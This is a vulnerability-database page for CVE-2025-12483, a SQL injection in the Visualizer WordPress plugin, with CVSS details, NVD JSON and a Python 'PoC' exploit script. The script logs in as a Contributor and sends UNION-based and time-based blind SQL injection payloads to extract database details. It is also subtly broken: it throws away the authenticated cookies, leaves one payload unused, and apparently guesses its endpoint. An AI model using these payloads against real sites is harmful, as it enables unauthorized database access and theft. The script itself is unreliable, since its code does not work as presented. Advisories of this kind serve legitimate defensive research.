Security Vulnerability Report
中文
CVE-2025-12483 CVSS 6.5 MEDIUM

CVE-2025-12483

Published: 2025-12-02 07:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Visualizer: Tables and Charts Manager for WordPress < 3.11.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urlencode # Target WordPress site with Visualizer plugin TARGET_URL = "http://target-wordpress-site.com" # Authentication credentials (Contributor+ role required) USERNAME = "attacker_username" PASSWORD = "attacker_password" def get_auth_cookie(): """Authenticate and get WordPress session cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' in str(session.cookies): return session.cookies return None def exploit_sql_injection(session): """Exploit SQL injection via query parameter""" # Vulnerable endpoint - Visualizer Gutenberg block exploit_url = f"{TARGET_URL}/wp-json/wp/v2/visualizer" # SQL injection payload - extract database name # Using UNION-based injection technique injection_payload = "1' UNION SELECT NULL,database(),user(),version()-- -" exploit_data = { 'query': injection_payload, 'action': 'visualizer_get_data', 'chart_id': '1' } # Alternative: Time-based blind injection blind_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -" headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': 'your-wp-nonce' # May need to fetch valid nonce } try: response = session.post( exploit_url, json=exploit_data, headers=headers, timeout=30 ) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Error: {e}") def main(): print("[*] CVE-2025-12483 SQL Injection Exploit") print("[*] Target: Visualizer WordPress Plugin < 3.11.14") session = requests.Session() cookies = get_auth_cookie() if cookies: print("[+] Authentication successful") exploit_sql_injection(session) else: print("[-] Authentication failed") sys.exit(1) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12483", "sourceIdentifier": "[email protected]", "published": "2025-12-02T07:15:46.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Gutenberg/Block.php#L499", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Source/Query.php#L173", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3405160%40visualizer%2Ftrunk&old=3355840%40visualizer%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94392c66-6e50-48bb-93cb-9aa9d0229761?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.